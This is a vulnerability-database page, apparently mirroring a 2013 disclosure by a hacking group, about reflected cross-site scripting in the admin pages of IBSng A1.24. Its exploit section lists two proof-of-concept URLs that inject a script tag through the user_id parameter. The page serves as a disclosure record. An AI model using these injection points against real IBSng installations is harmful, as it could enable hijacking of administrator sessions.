IBSng Version A1.24 Cross Site Scripting Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044673 漏洞类型
发布时间 2013-08-06 更新时间 2013-08-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080048
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-============== In The Name Of God ==============-

# Title : IBSng Version A1.24 Cross Site Scripting Vulnerability

# Author : IRaNHaCK Security Team

# Tested on : 7 , Xp , Backtrack

# Vendor : http://ibs.sourceforge.net/

# Date : 2013-08-05

# Our Website : WWW.IRaNHaCK.ORG

<------------------------------------------>

-==========<XsS>==========-

1- Http://127.0.0.1/IBSng/admin/report/realtime_web_analyzer.php?username=[Username]&user_id=<script>alert(/IRaNHaCK/)</script>

2- Http://127.0.0.1/IBSng/admin/user/change_credit.php?user_id=<script>alert(/IRaNHaCK/)</script>

<------------------------------------------>

Greetz : Mr.XpR - Secret.Walker - V30Sharp - FarbodEZRaeL - AL1R3Z4 - Mr.a!i - ZeroKilleR - Mr.FixXxer - @3is - mr.3lr0n - r0bb3r68 

M.R.S.CO - Mr.Cicili - Navid Black Hat - FTA_boy - Mh0122 & All Of Our Friends

./MojiRider
./Persian Gulf For EVER